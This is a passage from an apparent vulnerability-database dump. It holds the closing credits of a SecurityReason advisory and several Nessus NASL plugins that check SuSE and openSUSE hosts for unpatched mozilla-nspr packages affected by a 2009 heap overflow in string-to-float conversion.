odI.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c\r\nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c\r\n\r\n\r\n--- 5. Credits ---\r\nDiscovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.\r\n\r\n\r\n--- 6. Greets ---\r\nInfospec p_e_a pi3\r\n\r\n\r\n--- 7. 
Contact ---\r\nEmail:\r\n- cxib {a.t] securityreason [d0t} com\r\n- sp3x {a.t] securityreason [d0t} com\r\n\r\nGPG:\r\n- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg\r\n- http://securityreason.com/key/sp3x.gpg\r\n\r\nhttp://securityreason.com/\r\nhttp://securityreason.pl/\n ", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-18465"}], "nessus": [{"lastseen": "2021-01-17T14:46:35", "description": "This update fixes a bug in the Mozilla NSPR helper libraries, which\ncould be used by remote attackers to potentially execute code via\nJavaScript vectors.\n\n - Security researcher Alin Rad Pop of Secunia Research\n reported a heap-based buffer overflow in Mozilla's\n string to floating point number conversion routines.\n Using this vulnerability an attacker could craft some\n malicious JavaScript code containing a very long string\n to be converted to a floating point number which would\n result in improper memory allocation and the execution\n of an arbitrary memory location. This vulnerability\n could thus be leveraged by the attacker to run arbitrary\n code on a victim's computer. 
(MFSA 2009-59 /\n CVE-2009-1563)", "edition": 24, "published": "2009-11-09T00:00:00", "title": "SuSE 10 Security Update : mozilla-nspr (ZYPP Patch Number 6630)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "modified": "2009-11-09T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_MOZILLA-NSPR-6630.NASL", "href": "https://www.tenable.com/plugins/nessus/42421", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42421);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0689\");\n\n script_name(english:\"SuSE 10 Security Update : mozilla-nspr (ZYPP Patch Number 6630)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a bug in the Mozilla NSPR helper libraries, which\ncould be used by remote attackers to potentially execute code via\nJavaScript vectors.\n\n - Security researcher Alin Rad Pop of Secunia Research\n reported a heap-based buffer overflow in Mozilla's\n string to floating point number conversion routines.\n Using this vulnerability an attacker could craft some\n malicious JavaScript code containing a very long string\n to be converted to a floating point number which would\n result in improper memory allocation and the execution\n of an arbitrary memory location. This vulnerability\n could thus be leveraged by the attacker to run arbitrary\n code on a victim's computer. 
(MFSA 2009-59 /\n CVE-2009-1563)\"\n );\n # http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2009-59/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1563.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6630.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/10/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"mozilla-nspr-4.8.2-1.5.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"mozilla-nspr-devel-4.8.2-1.5.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"mozilla-nspr-32bit-4.8.2-1.5.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"mozilla-nspr-4.8.2-1.5.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"mozilla-nspr-devel-4.8.2-1.5.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"mozilla-nspr-32bit-4.8.2-1.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:03:34", "description": "This update fixes a bug in the Mozilla NSPR helper libraries, which\ncould be used by remote attackers to potentially execute code via\nJavaScript vectors.\n\nMFSA 2009-59 / CVE-2009-1563: Security 
researcher Alin Rad Pop of\nSecunia Research reported a heap-based buffer overflow in Mozilla's\nstring to floating point number conversion routines. Using this\nvulnerability an attacker could craft some malicious JavaScript code\ncontaining a very long string to be converted to a floating point\nnumber which would result in improper memory allocation and the\nexecution of an arbitrary memory location. This vulnerability could\nthus be leveraged by the attacker to run arbitrary code on a victim's\ncomputer.", "edition": 24, "published": "2009-11-09T00:00:00", "title": "openSUSE Security Update : mozilla-nspr (mozilla-nspr-1510)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "modified": "2009-11-09T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:mozilla-nspr", "p-cpe:/a:novell:opensuse:mozilla-nspr-32bit", "p-cpe:/a:novell:opensuse:mozilla-nspr-devel"], "id": "SUSE_11_0_MOZILLA-NSPR-091104.NASL", "href": "https://www.tenable.com/plugins/nessus/42416", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update mozilla-nspr-1510.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42416);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0689\");\n\n script_name(english:\"openSUSE Security Update : mozilla-nspr (mozilla-nspr-1510)\");\n script_summary(english:\"Check for the mozilla-nspr-1510 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a bug in the Mozilla NSPR helper libraries, which\ncould be 
used by remote attackers to potentially execute code via\nJavaScript vectors.\n\nMFSA 2009-59 / CVE-2009-1563: Security researcher Alin Rad Pop of\nSecunia Research reported a heap-based buffer overflow in Mozilla's\nstring to floating point number conversion routines. Using this\nvulnerability an attacker could craft some malicious JavaScript code\ncontaining a very long string to be converted to a floating point\nnumber which would result in improper memory allocation and the\nexecution of an arbitrary memory location. This vulnerability could\nthus be leveraged by the attacker to run arbitrary code on a victim's\ncomputer.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=546371\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mozilla-nspr packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nspr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nspr-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nspr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mozilla-nspr-4.8.2-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mozilla-nspr-devel-4.8.2-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", cpu:\"x86_64\", reference:\"mozilla-nspr-32bit-4.8.2-1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mozilla-nspr\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:04:52", "description": "This update fixes a bug in the Mozilla NSPR helper libraries, which\ncould be used by remote attackers to potentially execute code via\nJavaScript vectors.\n\nMFSA 2009-59 / CVE-2009-1563: Security researcher Alin Rad Pop of\nSecunia Research reported a heap-based buffer overflow in Mozilla's\nstring to floating point number conversion routines. 
Using this\nvulnerability an attacker could craft some malicious JavaScript code\ncontaining a very long string to be converted to a floating point\nnumber which would result in improper memory allocation and the\nexecution of an arbitrary memory location. This vulnerability could\nthus be leveraged by the attacker to run arbitrary code on a victim's\ncomputer.", "edition": 24, "published": "2009-11-09T00:00:00", "title": "openSUSE Security Update : mozilla-nspr (mozilla-nspr-1510)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "modified": "2009-11-09T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mozilla-nspr", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:mozilla-nspr-32bit", "p-cpe:/a:novell:opensuse:mozilla-nspr-devel"], "id": "SUSE_11_1_MOZILLA-NSPR-091104.NASL", "href": "https://www.tenable.com/plugins/nessus/42418", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update mozilla-nspr-1510.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42418);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0689\");\n\n script_name(english:\"openSUSE Security Update : mozilla-nspr (mozilla-nspr-1510)\");\n script_summary(english:\"Check for the mozilla-nspr-1510 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a bug in the Mozilla NSPR helper libraries, which\ncould be used by remote attackers to potentially execute code via\nJavaScript vectors.\n\nMFSA 2009-59 / CVE-2009-1563: Security researcher Alin Rad Pop 
of\nSecunia Research reported a heap-based buffer overflow in Mozilla's\nstring to floating point number conversion routines. Using this\nvulnerability an attacker could craft some malicious JavaScript code\ncontaining a very long string to be converted to a floating point\nnumber which would result in improper memory allocation and the\nexecution of an arbitrary memory location. This vulnerability could\nthus be leveraged by the attacker to run arbitrary code on a victim's\ncomputer.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=546371\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected mozilla-nspr packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nspr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nspr-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mozilla-nspr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 
audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mozilla-nspr-4.8.2-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mozilla-nspr-devel-4.8.2-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"mozilla-nspr-32bit-4.8.2-1.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mozilla-nspr\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:13:32", "description": "This update fixes a bug in the Mozilla NSPR helper libraries, which\ncould be used by remote attackers to potentially execute code via\nJavaScript vectors.\n\n - Security researcher Alin Rad Pop of Secunia Research\n reported a heap-based buffer overflow in Mozilla's\n string to floating point number conversion routines.\n Using this vulnerability an attacker could craft some\n malicious JavaScript code containing a very long string\n to be converted to a floating point number which would\n result in improper memory allocation and the execution\n of an arbitrary memory location. This vulnerability\n could thus be leveraged by the attacker to run arbitrary\n code on a victim's computer. 
(MFSA 2009-59 /\n CVE-2009-1563)", "edition": 24, "published": "2009-11-09T00:00:00", "title": "SuSE 11 Security Update : Mozilla (SAT Patch Number 1503)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "modified": "2009-11-09T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:mozilla-nspr-32bit", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:mozilla-nspr"], "id": "SUSE_11_MOZILLA-NSPR-091103.NASL", "href": "https://www.tenable.com/plugins/nessus/42420", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42420);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0689\");\n\n script_name(english:\"SuSE 11 Security Update : Mozilla (SAT Patch Number 1503)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a bug in the Mozilla NSPR helper libraries, which\ncould be used by remote attackers to potentially execute code via\nJavaScript vectors.\n\n - Security researcher Alin Rad Pop of Secunia Research\n reported a heap-based buffer overflow in Mozilla's\n string to floating point number conversion routines.\n Using this vulnerability an attacker could craft some\n malicious JavaScript code containing a very long string\n to be converted to a floating point number which would\n result in improper memory allocation and the execution\n of an arbitrary memory location. 
This vulnerability\n could thus be leveraged by the attacker to run arbitrary\n code on a victim's computer. (MFSA 2009-59 /\n CVE-2009-1563)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=546371\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1563.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 1503.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-nspr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:mozilla-nspr-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) 
audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"mozilla-nspr-4.8.2-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-nspr-4.8.2-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-nspr-32bit-4.8.2-1.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"mozilla-nspr-4.8.2-1.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"mozilla-nspr-32bit-4.8.2-1.1.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"mozilla-nspr-32bit-4.8.2-1.1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:46:35", "description": "This update fixes a bug in the Mozilla NSPR helper libraries, which\ncould be used by remote attackers to potentially execute code via\nJavaScript vectors.\n\n - Security researcher Alin Rad Pop of Secunia Research\n reported a heap-based buffer overflow in Mozilla's\n string to floating point number conversion routines.\n Using this vulnerability an attacker could craft some\n malicious JavaScript code containing a very long string\n to be converted to a floating point number which would\n result in improper memory allocation and the execution\n of an arbitrary memory location. This vulnerability\n could thus be leveraged by the attacker to run arbitrary\n code on a victim's computer. 
(MFSA 2009-59 /\n CVE-2009-1563)", "edition": 24, "published": "2010-10-11T00:00:00", "title": "SuSE 10 Security Update : mozilla-nspr (ZYPP Patch Number 6631)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "modified": "2010-10-11T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_MOZILLA-NSPR-6631.NASL", "href": "https://www.tenable.com/plugins/nessus/49895", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49895);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0689\");\n\n script_name(english:\"SuSE 10 Security Update : mozilla-nspr (ZYPP Patch Number 6631)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a bug in the Mozilla NSPR helper libraries, which\ncould be used by remote attackers to potentially execute code via\nJavaScript vectors.\n\n - Security researcher Alin Rad Pop of Secunia Research\n reported a heap-based buffer overflow in Mozilla's\n string to floating point number conversion routines.\n Using this vulnerability an attacker could craft some\n malicious JavaScript code containing a very long string\n to be converted to a floating point number which would\n result in improper memory allocation and the execution\n of an arbitrary memory location. This vulnerability\n could thus be leveraged by the attacker to run arbitrary\n code on a victim's computer. 
(MFSA 2009-59 /\n CVE-2009-1563)\"\n );\n # http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2009-59/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1563.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6631.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/10/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"mozilla-nspr-4.8.2-1.5.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"mozilla-nspr-devel-4.8.2-1.5.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", 